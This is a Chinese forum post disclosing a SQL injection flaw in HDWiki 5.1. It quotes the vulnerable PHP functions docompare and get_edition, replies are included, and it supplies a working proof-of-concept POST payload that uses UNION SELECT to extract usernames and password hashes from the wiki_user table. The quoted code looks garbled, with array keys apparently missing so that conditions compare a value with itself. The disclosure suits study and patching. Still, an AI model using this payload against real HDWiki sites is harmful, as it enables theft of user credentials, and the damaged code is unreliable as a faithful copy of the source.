hdwiki5.1 SQL注入漏洞
Author:phithon/control/edition.php 119行
function docompare(){
if(!empty($this->setting['check_useragent'])) {
$this->load('anticopy');
if(!$_ENV['anticopy']->check_useragent()){
$this->message('禁止访问','',0);
}
}
if(!empty($this->setting['check_visitrate'])) {
$this->load('anticopy');
$_ENV['anticopy']->check_visitrate();
}
if ($this->get == 'box'){
@header('Content-type: text/html; charset='.WIKI_CHARSET);
if(!@is_numeric($this->get)||!@is_numeric($this->get)){
$this->message($this->view->lang['parameterError'],'index.php',0);
}
$did = $this->get;
$eid = $this->get;
$edition = array();
$editions=$_ENV['doc']->get_edition_list($did,'`time`,`authorid`,`author`,`words`,`images`,`content`', $eid);
$this->view->assign('edition',$editions);
$this->view->display('comparebox');
exit;
}
if(@!is_numeric($this->post['eid'])||@!is_numeric($this->post['eid'])){
$this->message($this->view->lang['parameterError'],'index.php',0);
}
$edition=$_ENV['doc']->get_edition($this->post['eid']);
if($edition['did']!=$edition['did']){
$this->message($this->view->lang['parameterError'],'index.php',0);
}
注意这句
if(@!is_numeric($this->post['eid'])||@!is_numeric($this->post['eid'])){
$this->message($this->view->lang['parameterError'],'index.php',0);
}
判断$this->post[‘eid’]和$this->post[‘eid’]如果有一个不是数字,则报错。
之后就将$this->post[‘eid’]传入get_edition函数,进去看看:
function get_edition($eid){
$editionlist=array();
if(is_numeric($eid)){
$edition= $this->db->fetch_first("SELECT * FROM ".DB_TABLEPRE."edition WHERE eid=$eid");
if($edition){
$edition['comtime']=$edition['time'];
$edition['time']=$this->base->date($edition['time']);
$edition['rawtitle']=$edition['title'];
$edition['title']=htmlspecialchars($edition['title']);
if(!$edition['content']){
$edition['content']=file::readfromfile($this->get_edition_fileinfo($edition['eid'],'file'));
}
}
return $edition;
}else{
$eid=implode(",",$eid);
$query=$this->db->query(" SELECT * FROM ".DB_TABLEPRE."edition WHERE eid IN ($eid)");
while($edition=$this->db->fetch_array($query)){
$edition['time']=$this->base->date($edition['time']);
$edition['rawtitle']=$edition['title'];
$edition['title']=htmlspecialchars($edition['title']);
if(!$edition['content']){
$edition['content']=file::readfromfile($this->get_edition_fileinfo($edition['eid'],'file'));
}
$editionlist[]=$edition;
}
return $editionlist;
}
}
注意这两句:
eid=2&eid=19&eid=-3) UNION SELECT 1,2,35,4,5,6,7,8,9,10,user(),username,password,14,15,16,17,18,19 from wiki_user%23
$eid=implode(",",$eid);
$query=$this->db->query(" SELECT * FROM ".DB_TABLEPRE."edition WHERE eid IN ($eid)");
这里直接将$eid解开后放进SQL语句中。所以你之前判断和是否是数字肯定不够啊,以后的元素都没有做判断,造成注入。
本地测试:
向http://localhost/hdwiki/index.php?edition-compare-1发送数据
(其中的数值需要根据实际情况调整,否则会显示参数错误,具体怎么调整看代码,默认安装是这个POC)
还是不错的哦,顶了 学习学习技术,加油! 学习学习技术,加油! 学习学习技术,加油! 支持,看起来不错呢!
页:
[1]